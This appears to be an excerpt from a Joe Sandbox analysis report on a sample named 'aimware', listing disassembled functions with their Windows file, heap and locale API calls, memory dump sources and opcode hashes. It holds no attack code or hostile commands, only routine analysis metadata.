GetStdHandle.KERNEL32(000000F5,?,?,?,?,00ABD343,00000001,?,?,?,00000000,00AC551D,?,?,?), ref: 00AB9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00AC551D,?,?,?,?,?,00AC4FC7,?), ref: 00AB9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00ABD343,00000001,?,?), ref: 00ABA011

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 06ecfc13d8f2d877d0d2993bb00611c928a2aa7bfe383d4b5ceae0c5a74fa188
Instruction ID: 957e0d3838420275c3a4ab9ea3a1e6217c6ac0ba503a1dfc824188cdfbb71197
Opcode Fuzzy Hash: 06ecfc13d8f2d877d0d2993bb00611c928a2aa7bfe383d4b5ceae0c5a74fa188
Instruction Fuzzy Hash: 8031AE31208345AFDB14DF20D848BFF77A9EF94721F044919FA819B291CB75AD48CBA2

Function 00ABA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00ABC27E: _wcslen.LIBCMT ref: 00ABC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00ABA175,?,00000001,00000000,?,?), ref: 00ABA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00ABA175,?,00000001,00000000,?,?), ref: 00ABA30C
GetLastError.KERNEL32(?,?,?,?,00ABA175,?,00000001,00000000,?,?), ref: 00ABA329

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: f35e87fe10298cf759f1c31d73746dd5c88c6dffd76b6485d5f9b61e42949f29
Instruction ID: 2179778c0944e5c68af34645b51173041f678086ad78ccd9744f9bd8ca017026
Opcode Fuzzy Hash: f35e87fe10298cf759f1c31d73746dd5c88c6dffd76b6485d5f9b61e42949f29
Instruction Fuzzy Hash: FB01D8361002246AEF21ABB54C49BFD33DC9F29781F044415F902DA093DB64CA81C6B7

Function 00ADB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00ADB8B8

Strings

, xrefs: 00ADB8FD

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: bfcfcf5c5aebb8cec6468d3f1d4909a75f8a3edcd7b11778a4a09f33b7cb3d33
Instruction ID: 86db1968be0a4ca14ae50c95300ada339ab2b1a8192156d992ff5e111e8b386e
Opcode Fuzzy Hash: bfcfcf5c5aebb8cec6468d3f1d4909a75f8a3edcd7b11778a4a09f33b7cb3d33
Instruction Fuzzy Hash: D141F67090438CDEDF218F658C94BEABBB9EB55304F1404EEE69B86242D335AA45DB70

Function 00ADAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00ADAFDD

Strings

LCMapStringEx, xrefs: 00ADAF7D, 00ADAF87

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 028fd044c3d4b980e83502e11ba907225b6115d4f058fc5ed4e2b1171c174ad5
Instruction ID: edf021ee783dd379f1aad90f5d65e85d9ada7f9601178650fc0932643a655348
Opcode Fuzzy Hash: 028fd044c3d4b980e83502e11ba907225b6115d4f058fc5ed4e2b1171c174ad5
Instruction Fuzzy Hash: 25012532504249BBCF029F91DC06DEE7F62FF1C750F054155FE1526261CA368A31AB81

Function 00ADAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00ADA56F), ref: 00ADAF55

Strings

InitializeCriticalSectionEx, xrefs: 00ADAF1B, 00ADAF25

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: f95d8d1f7aeb3f51a6147a3c1d26c0c15d91d0d707c9338a12964bdafb98ff3c
Instruction ID: 933f75c6e86e6b4e4e07f8b59e2eb4d501123030c79362b454ab9c756e6710e1
Opcode Fuzzy Hash: f95d8d1f7aeb3f51a6147a3c1d26c0c15d91d0d707c9338a12964bdafb98ff3c
Instruction Fuzzy Hash: 71F05931645208BFCF119F91CC06CAD7F61EF18711B004059FC095B320DA314E1197C5

Function 00ADADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00ADADEE

Strings

FlsAlloc, xrefs: 00ADADC0, 00ADADCA

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: bd1ad7bf43d4151bfee9f6bbea2f9cd71490249ac8504f14b5c459cde112055d
Instruction ID: 349bbdbc248360306e5d5eb43faf8c4ae9365043464dee0b9bc99a0a7d042559
Opcode Fuzzy Hash: bd1ad7bf43d4151bfee9f6bbea2f9cd71490249ac8504f14b5c459cde112055d
Instruction Fuzzy Hash: BDE02B316452587FCB11EBA6DC46E7EBB65EF24721B01019AFC069B341DE705F0187D6

Function 00ACEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACEAF9

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Strings

3Ro, xrefs: 00ACEAE7, 00ACEAF3

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Ro
API String ID: 1269201914-1492261280
Opcode ID: 57a15b35e58b15df68df3c12e5cfce1cbef87113baaea679f3e4ed187511c741
Instruction ID: b30257df38424a7d78b0d437b9f7760eab4c62bcebc3bf7ecba8830a94c818a0
Opcode Fuzzy Hash: 57a15b35e58b15df68df3c12e5cfce1cbef87113baaea679f3e4ed187511c741
Instruction Fuzzy Hash: ACB012DB29B0827C3504E3011E06E37119CD0C0FE1332942EF400D4081EC800D420431

Function 00ADBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00ADB7BB: GetOEMCP.KERNEL32(00000000,?,?,00ADBA44,?), ref: 00ADB7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00ADBA89,?,00000000), ref: 00ADBC64
GetCPInfo.KERNEL32(00000000,00ADBA89,?,?,?,00ADBA89,?,00000000), ref: 00ADBC77

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: f22bbb6918308fd1db697e4fb89293bd9a7dbc995fde0d551fc72686ed3138cd
Instruction ID: 8abc9d0ac907d1f215320747e052a61c7de459e49d0cdd43a5f3ac93c55ffb22
Opcode Fuzzy Hash: f22bbb6918308fd1db697e4fb89293bd9a7dbc995fde0d551fc72686ed3138cd
Instruction Fuzzy Hash: AC51E070A20245DEDB20CF75C8856BABBF6EF45300F1A446FD4978B362DB3599468BA0

Function 00AB9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00AB9A50,?,?,00000000,?,?,00AB8CBC,?), ref: 00AB9BAB
GetLastError.KERNEL32(?,00000000,00AB8411,-00009570,00000000,000007F3), ref: 00AB9BB6

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5d13c873ddb82a12319d17939a15d70fa896fa12557c3bd1d14f61dc13dc01dd
Instruction ID: 1e35a36aea20c6f8b4a80549a8a715d154526f691abd805fa5b8116195e2e771
Opcode Fuzzy Hash: 5d13c873ddb82a12319d17939a15d70fa896fa12557c3bd1d14f61dc13dc01dd
Instruction Fuzzy Hash: 0F41CC316043418FDB24DF25E5849EBB7EEFFD8320F158A2DEA8183262D770AD458B91

Function 00ADBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00AD97E5: GetLastError.KERNEL32(?,00AF1030,00AD4674,00AF1030,?,?,00AD3F73,00000050,?,00AF1030,00000200), ref: 00AD97E9
Part of subcall function 00AD97E5: _free.LIBCMT ref: 00AD981C
Part of subcall function 00AD97E5: SetLastError.KERNEL32(00000000,?,00AF1030,00000200), ref: 00AD985D
Part of subcall function 00AD97E5: _abort.LIBCMT ref: 00AD9863

Part of subcall function 00ADBB4E: _abort.LIBCMT ref: 00ADBB80
Part of subcall function 00ADBB4E: _free.LIBCMT ref: 00ADBBB4

Part of subcall function 00ADB7BB: GetOEMCP.KERNEL32(00000000,?,?,00ADBA44,?), ref: 00ADB7E6

_free.LIBCMT ref: 00ADBA9F
_free.LIBCMT ref: 00ADBAD5

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: c5522f63828ca0801b73080b826289bcfd3b8bba3180024b1c2a81617f352bcb
Instruction ID: 9b1942586d0e47ca1c07bef22bac85feeaea8d141940bfbaa83fc7ad6e30ad69
Opcode Fuzzy Hash: c5522f63828ca0801b73080b826289bcfd3b8bba3180024b1c2a81617f352bcb
Instruction Fuzzy Hash: E731C731914109EFDB10DFA8D541B9D77F5EF40360F62409BE4069B3A2EB369E41DB60

Function 00AB1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB1E55

Part of subcall function 00AB3BBA: __EH_prolog.LIBCMT ref: 00AB3BBF

_wcslen.LIBCMT ref: 00AB1EFD

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: d620d8825d60f3b219bbb2ed50a258f824cae248ed7767a265f812ac8bbf1daf
Instruction ID: 1b050e19f05fb62aa833541fd4dd39658b747d38f29a7e9ecb7e59ba342df8f8
Opcode Fuzzy Hash: d620d8825d60f3b219bbb2ed50a258f824cae248ed7767a265f812ac8bbf1daf
Instruction Fuzzy Hash: 15314B729042099FCF15DFA8CA55AEEBBFABF18300F50006EF445A7252CB369E10CB60

Function 00AB9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00AB73BC,?,?,?,00000000), ref: 00AB9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00AB9E70

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 34c2884d73b20a08e3981bb3d8d318e624f8d144a775bae75fd1e29b5b96383a
Instruction ID: e69a75455e3947602267065d898c01dc2857b78b0a76ce3d09e448854135d99f
Opcode Fuzzy Hash: 34c2884d73b20a08e3981bb3d8d318e624f8d144a775bae75fd1e29b5b96383a
Instruction Fuzzy Hash: 5E21D031248385ABC714CF75C891BABBBE8AF55304F08491DF5C587242D329E90D9B61

Function 00AB966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00AB9F27,?,?,00AB771A), ref: 00AB96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00AB9F27,?,?,00AB771A), ref: 00AB9716

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 675a01f6969b4a35dc0d102de94a2293b4c7114b21ac1274289639d04507d079
Instruction ID: 7488fe9b2b1a94563be24c3c5d1c0bfdd157d8bd9cde0a2e642831fe4ca09af1
Opcode Fuzzy Hash: 675a01f6969b4a35dc0d102de94a2293b4c7114b21ac1274289639d04507d079
Instruction Fuzzy Hash: 5321CFB1104344AFE3308B65CD89FF7B7DCEB49324F104A19FA96C61D2C7B8A8849671

Function 00AB9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00AB9EC7
GetLastError.KERNEL32 ref: 00AB9ED4

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 4801cdd8338a6bab077b5e4468ea59933ad8244ad5b78ea8fbd17a5c253f8abc
Instruction ID: c70c6b48d6987ede0fc5f081c94a8afe27d7be44bef29ee605435cc7b8441dd2
Opcode Fuzzy Hash: 4801cdd8338a6bab077b5e4468ea59933ad8244ad5b78ea8fbd17a5c253f8abc
Instruction Fuzzy Hash: C911C231600704ABE724C768C884BF7B7EDAB44370F504A29E252D26D1D770ED45C760

Function 00AD8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00AD8E75

Part of subcall function 00AD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00ADCA2C,00000000,?,00AD6CBE,?,00000008,?,00AD91E0,?,?,?), ref: 00AD8E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00AF1098,00AB17CE,?,?,00000007,?,?,?,00AB13D6,?,00000000), ref: 00AD8EB1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: e3624a072b3503d7de6dfe20ea8ace2598b8bd1baa8ae8ec9e19a37c92924746
Instruction ID: d8219b3561d0d1af0e41a8aaef259111995b22cbba9cbb62628ef4e9939597eb
Opcode Fuzzy Hash: e3624a072b3503d7de6dfe20ea8ace2598b8bd1baa8ae8ec9e19a37c92924746
Instruction Fuzzy Hash: 4DF0C232601111A6CB217B259D05BAF37788FC1B70F244127F817AA391DF78CD0089A0

Function 00AC109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00AC10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00AC10B2

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 6afe3692bb83f973f5b8a2c46695a4101f7edd3876db6d43657dd4753d48b28a
Instruction ID: 62ed1fedd0058500a2ba0bf698045afac9e1dcf7d5172f02abad269fd1b3a06c
Opcode Fuzzy Hash: 6afe3692bb83f973f5b8a2c46695a4101f7edd3876db6d43657dd4753d48b28a
Instruction Fuzzy Hash: 7BE0D833B00185A7CF09CBB49C59EEB73DDEA4524431141BDE403D7202F930DE424B60

Function 00ABA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00ABA325,?,?,?,00ABA175,?,00000001,00000000,?,?), ref: 00ABA501

Part of subcall function 00ABBB03: _wcslen.LIBCMT ref: 00ABBB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00ABA325,?,?,?,00ABA175,?,00000001,00000000,?,?), ref: 00ABA532

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
